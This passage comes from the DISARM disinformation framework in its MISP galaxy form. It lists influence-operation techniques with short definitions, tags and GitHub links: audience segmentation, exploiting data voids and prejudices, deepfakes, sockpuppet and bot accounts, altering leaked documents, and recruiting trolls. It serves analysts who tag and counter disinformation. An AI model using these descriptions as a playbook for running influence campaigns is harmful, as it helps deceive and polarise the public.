Information Pollution occurs when threat actors attempt to ruin a source of information by flooding it with lots of inauthentic or unreliable content, intending to make it harder for legitimate users to find the information they’re looking for. 

This subtechnique’s objective is to reduce exposure to target information, rather than promoting exposure to campaign content, for which the parent technique T0049 can be used. 

Analysts will need to infer what the motive for flooding an information space was when deciding whether to use T0049 or T0049.008 to tag a case when an information space is flooded. If such inference is not possible, default to T0049.

This Technique previously used the ID T0019.

The tag is: misp-galaxy:disarm-techniques="Generate Information Pollution"

Table 1301. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.008.md

Organise Events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings in support of incident narratives.

The tag is: misp-galaxy:disarm-techniques="Organise Events"

Table 1302. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.md

Pay for Physical Action

Paying for physical action occurs when an influence operation pays individuals to act in the physical realm. An influence operation may pay for physical action to create specific situations and frame them in a way that supports operation narratives, for example, paying a group of people to burn a car to later post an image of the burning car and frame it as an act of protest.

The tag is: misp-galaxy:disarm-techniques="Pay for Physical Action"

Table 1303. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.001.md

Conduct Symbolic Action

Symbolic action refers to activities specifically intended to advance an operation’s narrative by signalling something to the audience, for example, a military parade supporting a state’s narrative of military superiority. An influence operation may use symbolic action to create falsified evidence supporting operation narratives in the physical information space.

The tag is: misp-galaxy:disarm-techniques="Conduct Symbolic Action"

Table 1304. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0057.002.md

Play the Long Game

Play the long game refers to two phenomena: 1. To plan messaging and allow it to grow organically without conducting your own amplification. This is methodical and slow and requires years for the message to take hold. 2. To develop a series of seemingly disconnected messaging narratives that eventually combine into a new narrative.

The tag is: misp-galaxy:disarm-techniques="Play the Long Game"

Table 1305. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0059.md

Continue to Amplify

Continue narrative or message amplification after the main incident work has finished.

The tag is: misp-galaxy:disarm-techniques="Continue to Amplify"

Table 1306. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0060.md

Sell Merchandise

Sell merchandise refers to getting the message or narrative into physical space in the offline world while making money.

The tag is: misp-galaxy:disarm-techniques="Sell Merchandise"

Table 1307. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0061.md

Prepare Physical Broadcast Capabilities

Create or co-opt broadcast capabilities (e.g. TV, radio, etc.).

The tag is: misp-galaxy:disarm-techniques="Prepare Physical Broadcast Capabilities"

Table 1308. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0065.md

Degrade Adversary

Plan to degrade an adversary’s image or ability to act. This could include preparation and use of harmful information about the adversary’s actions or reputation.

The tag is: misp-galaxy:disarm-techniques="Degrade Adversary"

Table 1309. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0066.md

Respond to Breaking News Event or Active Crisis

Media attention on a story or event is heightened during a breaking news event, where unclear facts and incomplete information increase speculation, rumours, and conspiracy theories, which are all vulnerable to manipulation.

The tag is: misp-galaxy:disarm-techniques="Respond to Breaking News Event or Active Crisis"

Table 1310. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0068.md

Segment Audiences

Create audience segmentations by features of interest to the influence campaign, including political affiliation, geographic location, income, demographics, and psychographics.

The tag is: misp-galaxy:disarm-techniques="Segment Audiences"

Table 1311. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.md

Geographic Segmentation

An influence operation may target populations in a specific geographic location, such as a region, state, or city. An influence operation may use geographic segmentation to Create Localised Content (see: Establish Legitimacy).

The tag is: misp-galaxy:disarm-techniques="Geographic Segmentation"

Table 1312. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.001.md

Demographic Segmentation

An influence operation may target populations based on demographic segmentation, including age, gender, and income. Demographic segmentation may be useful for influence operations aiming to change state policies that affect a specific population sector. For example, an influence operation attempting to influence Medicare funding in the United States would likely target U.S. voters over 65 years of age.

The tag is: misp-galaxy:disarm-techniques="Demographic Segmentation"

Table 1313. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.002.md

Economic Segmentation

An influence operation may target populations based on their income bracket, wealth, or other financial or economic division.

The tag is: misp-galaxy:disarm-techniques="Economic Segmentation"

Table 1314. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.003.md

Psychographic Segmentation

An influence operation may target populations based on psychographic segmentation, which uses audience values and decision-making processes. An operation may individually gather psychographic data with its own surveys or collection tools or externally purchase data from social media companies or online surveys, such as personality quizzes.

The tag is: misp-galaxy:disarm-techniques="Psychographic Segmentation"

Table 1315. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.004.md

Political Segmentation

An influence operation may target populations based on their political affiliations, especially when aiming to manipulate voting or change policy.

The tag is: misp-galaxy:disarm-techniques="Political Segmentation"

Table 1316. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0072.005.md

Determine Target Audiences

Determining the target audiences (segments of the population) who will receive campaign narratives and artefacts intended to achieve the strategic ends.

The tag is: misp-galaxy:disarm-techniques="Determine Target Audiences"

Table 1317. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0073.md

Determine Strategic Ends

These are the long-term end-states the campaign aims to bring about. They typically involve an advantageous position vis-a-vis competitors in terms of power or influence. The strategic goal may be to improve or simply to hold one’s position. Competition occurs in the public sphere in the domains of war, diplomacy, politics, economics, and ideology, and can play out between armed groups, nation-states, political parties, corporations, interest groups, or individuals.

The tag is: misp-galaxy:disarm-techniques="Determine Strategic Ends"

Table 1318. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.md

Geopolitical Advantage

Favourable position on the international stage in terms of great power politics or regional rivalry. Geopolitics plays out in the realms of foreign policy, national security, diplomacy, and intelligence. It involves nation-state governments, heads of state, foreign ministers, intergovernmental organisations, and regional security alliances.

The tag is: misp-galaxy:disarm-techniques="Geopolitical Advantage"

Table 1319. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.001.md

Domestic Political Advantage

Favourable position vis-à-vis national or sub-national political opponents such as political parties, interest groups, politicians, candidates.

The tag is: misp-galaxy:disarm-techniques="Domestic Political Advantage"

Table 1320. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.002.md

Economic Advantage

Favourable position domestically or internationally in the realms of commerce, trade, finance, industry. Economics involves nation-states, corporations, banks, trade blocs, industry associations, cartels.

The tag is: misp-galaxy:disarm-techniques="Economic Advantage"

Table 1321. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.003.md

Ideological Advantage

Favourable position domestically or internationally in the market for ideas, beliefs, and world views. Competition plays out among faith systems, political systems, and value systems. It can involve sub-national, national or supra-national movements.

The tag is: misp-galaxy:disarm-techniques="Ideological Advantage"

Table 1322. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0074.004.md

Dismiss

Push back against criticism by dismissing your critics. This might be arguing that the critics use a different standard for you than for other actors or themselves, or arguing that their criticism is biased.

The tag is: misp-galaxy:disarm-techniques="Dismiss"

Table 1323. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0075.md

Discredit Credible Sources

Plan to delegitimize the media landscape and degrade public trust in reporting, by discrediting credible sources. This makes it easier to promote influence operation content.

The tag is: misp-galaxy:disarm-techniques="Discredit Credible Sources"

Table 1324. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0075.001.md

Distort

Twist the narrative. Take information, or artefacts like images, and change the framing around them.

The tag is: misp-galaxy:disarm-techniques="Distort"

Table 1325. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0076.md

Distract

Shift attention to a different narrative or actor, for instance by accusing critics of the same activity that they’ve accused you of (e.g. police brutality).

The tag is: misp-galaxy:disarm-techniques="Distract"

Table 1326. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0077.md

Dismay

Threaten the critic or narrator of events. For instance, threaten journalists or news outlets reporting on a story.

The tag is: misp-galaxy:disarm-techniques="Dismay"

Table 1327. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0078.md

Divide

Create conflict between subgroups, to widen divisions in a community.

The tag is: misp-galaxy:disarm-techniques="Divide"

Table 1328. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0079.md

Map Target Audience Information Environment

Mapping the target audience information environment analyses the information space itself, including social media analytics, web traffic, and media surveys. Mapping the information environment may help the influence operation determine the most realistic and popular information channels to reach its target audience. Mapping the target audience information environment aids influence operations in determining the most vulnerable areas of the information space to target with messaging.

The tag is: misp-galaxy:disarm-techniques="Map Target Audience Information Environment"

Table 1329. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.md

Monitor Social Media Analytics

An influence operation may use social media analytics to determine which factors will increase the operation content’s exposure to its target audience on social media platforms, including views, interactions, and sentiment relating to topics and content types. The social media platform itself or a third-party tool may collect the metrics.

The tag is: misp-galaxy:disarm-techniques="Monitor Social Media Analytics"

Table 1330. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.001.md

Evaluate Media Surveys

An influence operation may evaluate its own or third-party media surveys to determine what type of content appeals to its target audience. Media surveys may provide insight into an audience’s political views, social class, general interests, or other indicators used to tailor operation messaging to its target audience.

The tag is: misp-galaxy:disarm-techniques="Evaluate Media Surveys"

Table 1331. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.002.md

Identify Trending Topics/Hashtags

An influence operation may identify trending hashtags on social media platforms for later use in boosting operation content. A hashtag refers to a word or phrase preceded by the hash symbol (#) on social media used to identify messages and posts relating to a specific topic. All public posts that use the same hashtag are aggregated onto a centralised page dedicated to the word or phrase and sorted either chronologically or by popularity.

The tag is: misp-galaxy:disarm-techniques="Identify Trending Topics/Hashtags"

Table 1332. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.003.md

Conduct Web Traffic Analysis

An influence operation may conduct web traffic analysis to determine which search engines, keywords, websites, and advertisements gain the most traction with its target audience.

The tag is: misp-galaxy:disarm-techniques="Conduct Web Traffic Analysis"

Table 1333. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.004.md

Assess Degree/Type of Media Access

An influence operation may survey a target audience’s Internet availability and degree of media freedom to determine which target audience members will have access to operation content and on which platforms. An operation may face more difficulty targeting an information environment with heavy restrictions and media control than an environment with independent media, freedom of speech and of the press, and individual liberties.

The tag is: misp-galaxy:disarm-techniques="Assess Degree/Type of Media Access"

Table 1334. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0080.005.md

Identify Social and Technical Vulnerabilities

Identifying social and technical vulnerabilities determines weaknesses within the target audience information environment for later exploitation. Vulnerabilities include decisive political issues, weak cybersecurity infrastructure, search engine data voids, and other technical and non-technical weaknesses in the target information environment. Identifying social and technical vulnerabilities facilitates the later exploitation of the identified weaknesses to advance operation objectives.

The tag is: misp-galaxy:disarm-techniques="Identify Social and Technical Vulnerabilities"

Table 1335. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.md

Find Echo Chambers

Find or plan to create areas (social media groups, search term groups, hashtag groups, etc.) where individuals only engage with people they agree with.

The tag is: misp-galaxy:disarm-techniques="Find Echo Chambers"

Table 1336. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.001.md

Identify Data Voids

A data void refers to a word or phrase that results in little, manipulative, or low-quality search engine data. Data voids are hard to detect and relatively harmless until exploited by an entity aiming to quickly proliferate false or misleading information during a phenomenon that causes a high number of individuals to query the term or phrase. In the Plan phase, an influence operation may identify data voids for later exploitation in the operation. A 2019 report by Michael Golebiewski identifies five types of data voids. (1) “Breaking news” data voids occur when a keyword gains popularity during a short period of time, allowing an influence operation to publish false content before legitimate news outlets have an opportunity to publish relevant information. (2) An influence operation may create a “strategic new terms” data void by creating their own terms and publishing information online before promoting their keyword to the target audience. (3) An influence operation may publish content on “outdated terms” that have decreased in popularity, capitalising on most search engines’ preferences for recency. (4) “Fragmented concepts” data voids separate connections between similar ideas, isolating segment queries to distinct search engine results. (5) An influence operation may use “problematic queries” that previously resulted in disturbing or inappropriate content to promote messaging until mainstream media recontextualizes the term.

The tag is: misp-galaxy:disarm-techniques="Identify Data Voids"

Table 1337. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.002.md

Identify Existing Prejudices

An influence operation may exploit existing racial, religious, demographic, or social prejudices to further polarise its target audience from the rest of the public.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Prejudices"

Table 1338. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.003.md

Identify Existing Fissures

An influence operation may identify existing fissures to pit target populations against one another or facilitate a “divide-and-conquer” approach to tailor operation narratives along the divides.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Fissures"

Table 1339. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.004.md

Identify Existing Conspiracy Narratives/Suspicions

An influence operation may assess preexisting conspiracy theories or suspicions in a population to identify existing narratives that support operational objectives.

The tag is: misp-galaxy:disarm-techniques="Identify Existing Conspiracy Narratives/Suspicions"

Table 1340. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.005.md

Identify Wedge Issues

A wedge issue is a divisive political issue, usually concerning a social phenomenon, that divides individuals along a defined line. An influence operation may exploit wedge issues by intentionally polarising the public along the wedge issue line and encouraging opposition between factions.

The tag is: misp-galaxy:disarm-techniques="Identify Wedge Issues"

Table 1341. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.006.md

Identify Target Audience Adversaries

An influence operation may identify or create a real or imaginary adversary to centre operation narratives against. A real adversary may include certain politicians or political parties, while imaginary adversaries may include falsified “deep state” actors that, according to conspiracies, run the state behind public view.

The tag is: misp-galaxy:disarm-techniques="Identify Target Audience Adversaries"

Table 1342. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.007.md

Identify Media System Vulnerabilities

An influence operation may exploit existing weaknesses in a target’s media system. These weaknesses may include existing biases among media agencies, vulnerability to false news agencies on social media, or existing distrust of traditional media sources. An existing distrust among the public in the media system’s credibility holds high potential for exploitation by an influence operation when establishing alternative news agencies to spread operation content.

The tag is: misp-galaxy:disarm-techniques="Identify Media System Vulnerabilities"

Table 1343. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0081.008.md

Develop New Narratives

Actors may develop new narratives to further strategic or tactical goals, especially when existing narratives adequately align with the campaign goals. New narratives provide more control in terms of crafting the message to achieve specific goals. However, new narratives may require more effort to disseminate than adapting or adopting existing narratives.

The tag is: misp-galaxy:disarm-techniques="Develop New Narratives"

Table 1344. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0082.md

Integrate Target Audience Vulnerabilities into Narrative

An influence operation may seek to exploit the preexisting weaknesses, fears, and enemies of the target audience for integration into the operation’s narratives and overall strategy. Integrating existing vulnerabilities into the operational approach conserves resources by exploiting already weak areas of the target information environment instead of forcing the operation to create new vulnerabilities in the environment.

The tag is: misp-galaxy:disarm-techniques="Integrate Target Audience Vulnerabilities into Narrative"

Table 1345. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0083.md

Reuse Existing Content

When an operation recycles content from its own previous operations or plagiarises from external operations. An operation may launder information to conserve resources that would have otherwise been utilised to develop new content.

The tag is: misp-galaxy:disarm-techniques="Reuse Existing Content"

Table 1346. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.md

Use Copypasta

Copypasta refers to a piece of text that has been copied and pasted multiple times across various online platforms. A copypasta’s final form may differ from its original source text as users add, delete, or otherwise edit the content as they repost the text.

The tag is: misp-galaxy:disarm-techniques="Use Copypasta"

Table 1347. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.001.md

Plagiarise Content

An influence operation may take content from other sources without proper attribution. This content may be either misinformation content shared by others without malicious intent but now leveraged by the campaign as disinformation or disinformation content from other sources.

The tag is: misp-galaxy:disarm-techniques="Plagiarise Content"

Table 1348. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.002.md

Deceptively Labelled or Translated

An influence operation may take authentic content from other sources and add deceptive labels or deceptively translate the content into other languages.

The tag is: misp-galaxy:disarm-techniques="Deceptively Labelled or Translated"

Table 1349. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.003.md

Appropriate Content

An influence operation may take content from other sources with proper attribution. This content may be either misinformation content shared by others without malicious intent but now leveraged by the campaign as disinformation, or disinformation content from other sources. Examples include the appropriation of content from one inauthentic news site to another inauthentic news site or network in ways that align with the originator’s licensing or terms of service.

The tag is: misp-galaxy:disarm-techniques="Appropriate Content"

Table 1350. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0084.004.md

Develop Text-Based Content

Creating and editing false or misleading text-based artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign.

The tag is: misp-galaxy:disarm-techniques="Develop Text-Based Content"

Table 1351. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.md

Develop AI-Generated Text

AI-generated text refers to synthetic text composed by computers using text-generating AI technology. Autonomous generation refers to content created by a bot without human input, also known as bot-created content generation. Autonomous generation represents the next step in automation after language generation and may lead to automated journalism. An influence operation may use read fakes or autonomous generation to quickly develop and distribute content to the target audience.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Text"

Table 1352. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.001.md

Develop Inauthentic News Articles

An influence operation may develop false or misleading news articles aligned to their campaign goals or narratives.

The tag is: misp-galaxy:disarm-techniques="Develop Inauthentic News Articles"

Table 1353. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.003.md

Develop Document

Produce text in the form of a document.

The tag is: misp-galaxy:disarm-techniques="Develop Document"

Table 1354. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.004.md

Develop Book

Produce text content in the form of a book. 

This technique covers both e-books and physical books, however, the former is more easily deployed by threat actors given the lower cost to develop.

The tag is: misp-galaxy:disarm-techniques="Develop Book"

Table 1355. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.005.md

Develop Opinion Article

Opinion articles (aka “Op-Eds” or “Editorials”) are articles or regular columns flagged as “opinion” posted to news sources, and can be contributed by people outside the organisation. 

Flagging articles as opinions allows news organisations to distinguish them from the typical expectations of objective news reporting while distancing the presented opinion from the organisation or its employees.

The use of this technique is not by itself an indication of malicious or inauthentic content; Op-eds are a common format in media. However, threat actors exploit op-eds to, for example, submit opinion articles to local media to promote their narratives.

Examples from the perspective of a news site involve publishing op-eds from perceived prestigious voices to give legitimacy to an inauthentic publication, or supporting causes by hosting op-eds from actors aligned with the organisation’s goals.

The tag is: misp-galaxy:disarm-techniques="Develop Opinion Article"

Table 1356. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.006.md

Create Fake Research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target Climate Science debate or pseudoscience like anti-vaxx.

This technique previously used the ID T0019.001.

The tag is: misp-galaxy:disarm-techniques="Create Fake Research"

Table 1357. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0085.007.md

Develop Image-Based Content

Creating and editing false or misleading visual artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include photographing staged real-life situations, repurposing existing digital images, or using image creation and editing technologies.

The tag is: misp-galaxy:disarm-techniques="Develop Image-Based Content"

Table 1358. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.md

Develop Memes

Memes are one of the most important single artefact types in all of computational propaganda. Memes in this framework denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:disarm-techniques="Develop Memes"

Table 1359. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.001.md

Develop AI-Generated Images (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Images (Deepfakes)"

Table 1360. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.002.md

Deceptively Edit Images (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio, for example slowing, speeding, or cutting footage, to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Images (Cheap Fakes)"

Table 1361. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.003.md

Aggregate Information into Evidence Collages

Image files that aggregate positive evidence (Joan Donovan)

The tag is: misp-galaxy:disarm-techniques="Aggregate Information into Evidence Collages"

Table 1362. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0086.004.md

Develop Video-Based Content

Creating and editing false or misleading video artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include staging videos of purportedly real situations, repurposing existing video artefacts, or using AI-generated video creation and editing technologies (including deepfakes).

The tag is: misp-galaxy:disarm-techniques="Develop Video-Based Content"

Table 1363. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.md

Develop AI-Generated Videos (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Videos (Deepfakes)"

Table 1364. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.001.md

Deceptively Edit Video (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio, for example slowing, speeding, or cutting footage, to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Video (Cheap Fakes)"

Table 1365. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0087.002.md

Develop Audio-Based Content

Creating and editing false or misleading audio artefacts, often aligned with one or more specific narratives, for use in a disinformation campaign. This may include creating completely new audio content, repurposing existing audio artefacts (including cheap fakes), or using AI-generated audio creation and editing technologies (including deepfakes).

The tag is: misp-galaxy:disarm-techniques="Develop Audio-Based Content"

Table 1366. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.md

Develop AI-Generated Audio (Deepfakes)

Deepfakes refer to AI-generated falsified photos, videos, or soundbites. An influence operation may use deepfakes to depict an inauthentic situation by synthetically recreating an individual’s face, body, voice, and physical gestures.

The tag is: misp-galaxy:disarm-techniques="Develop AI-Generated Audio (Deepfakes)"

Table 1367. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.001.md

Deceptively Edit Audio (Cheap Fakes)

Cheap fakes utilise less sophisticated measures of altering an image, video, or audio, for example slowing, speeding, or cutting footage, to create a false context surrounding an image or event.

The tag is: misp-galaxy:disarm-techniques="Deceptively Edit Audio (Cheap Fakes)"

Table 1368. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0088.002.md

Obtain Private Documents

Procuring documents that are not publicly available, by whatever means — whether legal or illegal, highly-resourced or less so. These documents can include authentic non-public documents, authentic non-public documents that have been altered, or inauthentic documents intended to appear as if they are authentic non-public documents. All of these types of documents can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Obtain Private Documents"

Table 1369. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.md

Obtain Authentic Documents

Procure authentic documents that are not publicly available, by whatever means — whether legal or illegal, highly-resourced or less so. These documents can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Obtain Authentic Documents"

Table 1370. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.001.md

Alter Authentic Documents

Alter authentic documents (public or non-public) to achieve campaign goals. The altered documents are intended to appear as if they are authentic and can be "leaked" during later stages in the operation.

The tag is: misp-galaxy:disarm-techniques="Alter Authentic Documents"

Table 1371. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0089.003.md

Create Inauthentic Accounts

Inauthentic accounts include bot accounts, cyborg accounts, sockpuppet accounts, and anonymous accounts.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Accounts"

Table 1372. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.md

Create Anonymous Accounts

Anonymous accounts or anonymous users refer to users that access network resources without providing a username or password. An influence operation may use anonymous accounts to spread content without direct attribution to the operation.

The tag is: misp-galaxy:disarm-techniques="Create Anonymous Accounts"

Table 1373. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.001.md

Create Cyborg Accounts

Cyborg accounts refer to partly manned, partly automated social media accounts. Cyborg accounts primarily act as bots, but a human operator periodically takes control of the account to engage with real social media users by responding to comments and posting original content. Influence operations may use cyborg accounts to reduce the amount of direct human input required to maintain a regular account but increase the apparent legitimacy of the cyborg account by occasionally breaking its bot-like behaviour with human interaction.

The tag is: misp-galaxy:disarm-techniques="Create Cyborg Accounts"

Table 1374. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.002.md

Create Bot Accounts

Bots refer to autonomous internet users that interact with systems or other users while imitating traditional human behaviour. Bots use a variety of tools to stay active without direct human operation, including artificial intelligence and big data analytics. For example, an individual may programme a Twitter bot to retweet a tweet every time it contains a certain keyword or hashtag. An influence operation may use bots to increase its exposure and artificially promote its content across the internet without dedicating additional time or human resources. Amplifier bots promote operation content through reposts, shares, and likes to increase the content’s online popularity. Hacker bots are traditionally covert bots running on computer scripts that rarely engage with users and work primarily as agents of larger cyberattacks, such as Distributed Denial of Service attacks. Spammer bots are programmed to post content on social media or in comment sections, usually as a supplementary tool. Impersonator bots pose as real people by mimicking human behaviour, complicating their detection.

The tag is: misp-galaxy:disarm-techniques="Create Bot Accounts"

Table 1375. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.003.md

Create Sockpuppet Accounts

Sockpuppet accounts refer to falsified accounts that either promote the influence operation’s own material or attack critics of the material online. Individuals who control sockpuppet accounts also man at least one other user account. Sockpuppet accounts help legitimise operation narratives by providing an appearance of external support for the material and discrediting opponents of the operation.

The tag is: misp-galaxy:disarm-techniques="Create Sockpuppet Accounts"

Table 1376. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0090.004.md

Recruit Malign Actors

Operators recruit bad actors by paying, recruiting, or exerting control over individuals, including trolls, partisans, and contractors.

The tag is: misp-galaxy:disarm-techniques="Recruit Malign Actors"

Table 1377. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.md

Recruit Contractors

Operators recruit paid contractors to support the campaign.

The tag is: misp-galaxy:disarm-techniques="Recruit Contractors"

Table 1378. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.001.md

Recruit Partisans

Operators recruit partisans (ideologically-aligned individuals) to support the campaign.

The tag is: misp-galaxy:disarm-techniques="Recruit Partisans"

Table 1379. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.002.md

Enlist Troll Accounts

